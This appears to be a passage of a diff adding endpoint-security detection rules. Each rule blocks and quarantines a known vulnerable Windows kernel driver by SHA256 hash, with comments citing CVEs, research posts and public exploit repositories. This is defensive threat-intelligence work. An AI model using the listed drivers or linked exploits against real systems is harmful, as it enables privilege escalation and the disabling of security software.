+ "id": "1de14c1e-662a-58d6-b0cd-1297f6cac62a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141237Z",
+ "creation_date": "2026-03-23T11:45:31.141239Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141245Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "438baa1b1dffc3c86b75c6506ba92a53741cd9d5fd7e6460b6e7fd151e25f51d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1de217d1-f1f8-5bdb-923b-3da5c275b1c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818906Z",
+ "creation_date": "2026-03-23T11:45:30.818908Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818914Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d9674a1364fde6b5e7fb1770bdebb8db7de8e15f3c976e5c5102775c95452967",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1dfb65ca-96c4-5e34-a158-5b6f7ef5710c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828703Z",
+ "creation_date": "2026-03-23T11:45:30.828705Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828710Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a18bb92e104e9f6de178c88f72866b365d9ec5d0d3868b0539900dfa3d25ed39",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1dffe9b1-2cf3-55ee-a109-8f5a07a1d918",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982520Z",
+ "creation_date": "2026-03-23T11:45:29.982522Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982528Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "64f9e664bc6d4b8f5f68616dd50ae819c3e60452efd5e589d6604b9356841b57",
+ "comment": "Vulnerable Kernel Driver (aka 1.sys) [https://www.loldrivers.io/drivers/a5792a63-ba77-44ac-bd4a-134b24b01033/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e02357b-1664-56cb-b1b9-effe08dcd95a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820086Z",
+ "creation_date": "2026-03-23T11:45:30.820089Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820096Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b6251a1883c5ed03ecdead8322e7d8105d075fef160abfe763d5873484b2a27",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e096492-1e83-521b-a177-21d1afc6687c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972595Z",
+ "creation_date": "2026-03-23T11:45:29.972596Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972602Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d0e25b879d830e4f867b09d6540a664b6f88bad353cd14494c33b31a8091f605",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e0b8d47-61f1-50c3-89ab-dff32d62b19b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143798Z",
+ "creation_date": "2026-03-23T11:45:32.143800Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143805Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7326aefff9ea3a32286b423a62baebe33b73251348666c1ee569afe62dd60e11",
+ "comment": "Vulnerable Kernel Driver (aka ACE-BASE.sys) [https://www.loldrivers.io/drivers/ff77b58d-e143-4f61-92de-c0d9bc0af7d5/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e2dfd73-268e-53d1-bfdd-5a4de544a39e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822465Z",
+ "creation_date": "2026-03-23T11:45:31.822468Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822477Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3bbfdefb8c8a7d0e7b0480ec06ad01b65ef056aea7e4fa2f0e8771e419a06b56",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e32aa28-50b7-50c4-9272-022994920873",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608492Z",
+ "creation_date": "2026-03-23T11:45:29.608494Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608499Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7539157df91923d4575f7f57c8eb8b0fd87f064c919c1db85e73eebb2910b60c",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e352c2f-4a29-5b28-91d7-635b79f954a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453813Z",
+ "creation_date": "2026-03-23T11:45:30.453817Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453825Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "516e39dcf7480de4bb86727321c099605a34a54f1d5b3a4aa6dc4bcf260274c9",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e448bed-2862-5091-b10f-6fa28a072e9c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818161Z",
+ "creation_date": "2026-03-23T11:45:31.818164Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818172Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aa3ebaa9faedddbeae1a80cc1953e79d1f6fae716e5f374f5bdf08015491a56e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e44b3a9-1542-5155-bc68-7b7f5b75118c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974143Z",
+ "creation_date": "2026-03-23T11:45:29.974145Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974151Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee3ff12943ced401e2b6df9e66e8a0be8e449fa9326cab241f471b2d8ffefdd7",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e488398-47e6-5fff-b179-c128384c7dc0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827103Z",
+ "creation_date": "2026-03-23T11:45:31.827105Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827111Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "624209252a70280a29d50cea1bed6f118a73b6558480659efb0bbad5c833ac8b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e5827c0-508a-5997-85c0-f31ad87a265f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618841Z",
+ "creation_date": "2026-03-23T11:45:29.618843Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618849Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "48567fa742841208d4f93f54031218703241baec6f59b1e4ab8a71c26de1cf85",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e6ce154-d886-51ed-acde-19aa0a7f6453",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144322Z",
+ "creation_date": "2026-03-23T11:45:31.144324Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144330Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ba164f28ac3703908f8b0e61f11a79eb5100bddbea25c4c89b1072b645434734",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e6df447-77bd-511e-b40f-1df267127b3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452187Z",
+ "creation_date": "2026-03-23T11:45:30.452190Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452199Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b617a072c578cea38c460e2851f3d122ba1b7cfa1f5ee3e9f5927663ac37af61",
+ "comment": "Vulnerable Kernel Driver (aka mhyprot3.sys) [https://www.loldrivers.io/drivers/2aa003cd-5f36-46a6-ae3d-f5afc2c8baa3/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e8a1f4b-3cd2-5790-bfcd-56eeed9ca8c2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817523Z",
+ "creation_date": "2026-03-23T11:45:30.817525Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b84dc9b885193ced6a1b6842a365a4f18d1683951bb11a5c780ab737ffa06684",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e8e0530-5ce1-5e53-9fa0-28da7970fd31",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145765Z",
+ "creation_date": "2026-03-23T11:45:31.145767Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2279f01c81a67657cc33fde99b28d968c34228e6422a90b3ba9ed91b9f66ec9b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e91be74-901b-578e-80b0-ebc824923841",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975237Z",
+ "creation_date": "2026-03-23T11:45:29.975239Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975244Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f05359fe5793e947711c72cc8413e3b1d96c8a54eaafe4803827c4414f2f8e85",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e9861ad-bac2-53fc-ae1c-038cebb2487f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810503Z",
+ "creation_date": "2026-03-23T11:45:31.810505Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810511Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a3a27a487d55d95821df5a311b44942cb18cfb7b917530d73b08f41e25cf218c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e9f3bf4-6626-55a2-9d5d-bb40c4bdeaa3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.147150Z",
+ "creation_date": "2026-03-23T11:45:32.147152Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.147158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "78ccae1341d6546c9d238e824a2261a961bd9a843f6d951d649fbc09ad0e01a0",
+ "comment": "Vulnerable Kernel Driver (aka BdApiUtil64.sys) [https://blog.talosintelligence.com/byovd-loader-deadlock-ransomware/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1eab2acf-25ab-5817-81e0-b0a2dc584930",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615554Z",
+ "creation_date": "2026-03-23T11:45:29.615557Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615562Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5eb233ed9df3c1def326e2c63ee304dc85af303f8c9f038c993aa6e34f91ffaf",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1eadbae6-1e01-5f4f-b9d7-fcdfbbb84d8c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
